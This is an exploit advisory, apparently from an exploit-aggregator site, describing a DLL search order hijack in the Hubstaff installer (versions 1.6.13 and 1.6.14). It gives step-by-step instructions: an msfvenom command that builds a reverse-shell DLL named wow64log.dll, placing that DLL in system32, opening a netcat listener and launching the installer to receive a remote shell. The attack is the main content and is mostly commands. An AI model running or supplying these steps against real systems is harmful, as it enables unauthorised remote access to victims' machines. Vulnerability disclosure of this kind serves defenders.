## https://sploitus.com/exploit?id=PACKETSTORM:172518
*#Exploit Title:* Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking
*#Date:* 14/05/2023
*#Exploit Author:* Ahsan Azad
*#Vendor Homepage:* https://hubstaff.com/
*#Software Link:* https://app.hubstaff.com/download
*#Version:* 1.6.13, 1.6.14
*#Tested On:* 64-bit operating system, x64-based processor
*Description*
Hubstaff is an employee work tracker with screenshots, timesheets, billing,
in-depth reports, and more.
During testing. It was found that the system32 subdirectory was missing a
DLL library with the name *wow64log.dll* that had been required by the
hubstaff's setup file during installation. Hence, using Metasploit's
msfvenom to create a new wow64log.dll file, Tester was able to get a
reverse shell locally.
*Exploit*
1- Generate a dll file with the name wow64log.dll using the command:
*msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f dll
-o wow64log.dll*
2- Place the newly generated DLL to the *system32 *directory.
3- Start a listener on attacker's console using:
*nc -lnvp <port_used_while_generating_DLL>*
4- Launch the exe.
Reverse shell will be receive as:
*C:\Windows>*
*Attachments (For the understanding of verification team)*
1.png - Showing the wow64.dll was not found by the exe. [image: 1.png]
2.png - Showing how tester was able to generate a new dll using msfvenom on
port 1337.
[image: 2.png]
3.png - Showing a reverse connection received on the attacker's console
at C:\Windows> by launching the exe.[image: 3.png]